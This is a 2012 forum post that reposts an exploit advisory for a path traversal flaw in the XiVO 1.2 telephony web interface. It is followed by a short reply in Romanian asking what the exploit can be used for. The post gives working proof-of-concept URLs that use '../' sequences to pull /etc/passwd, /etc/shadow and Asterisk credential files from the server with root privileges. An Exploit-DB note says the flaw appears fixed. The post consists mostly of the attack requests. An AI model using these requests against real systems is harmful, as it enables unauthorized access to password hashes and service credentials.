The_Arhitect Posted November 7, 2012 Report Share Posted November 7, 2012 Xivo 1.2 Arbitrary File DownloadXivo 1.2 Arbitrary File Download under root privileges===============================================================Date: 6/11/2012Exploit Author: Mr.Un1k0d3rVendor Homepage: https://wiki.xivo.frSoftware Link: https://wiki.xivo.fr/index.php/XiVO_1.1-Gallifrey/Install_XiVO_With_CDVersion: 1.2 (last patched version)Tested on: Linux xivo 2.6.32-5-486Exploit:Using the web interface you can download any file from the system. The web application is running under root privileges. You can download clear text password, /etc/passwd, /etc/shadow and many more...POC:https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/passwdhttps://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/shadow https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/asterisk/manager.confhttps://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/asterisk/cel_pgsql.confThis vulnerability was discover by Mr.Un1k0d3r From RingZer0 Team.Exploit-DB Note:This appears to have been fixedhttps://projects.xivo.fr/issues/3912http://git.xivo.fr/?p=official/xivo-skaro.git;a=commit;h=127ab43e6d8e8ed94f16ff388fb62fd611a40e19Sursa: Xivo 1.2 Arbitrary File Download Quote Link to comment Share on other sites More sharing options...
XnEOS Posted December 18, 2012 Report Share Posted December 18, 2012 ptoi macar zice ce pot face cu el? Quote Link to comment Share on other sites More sharing options...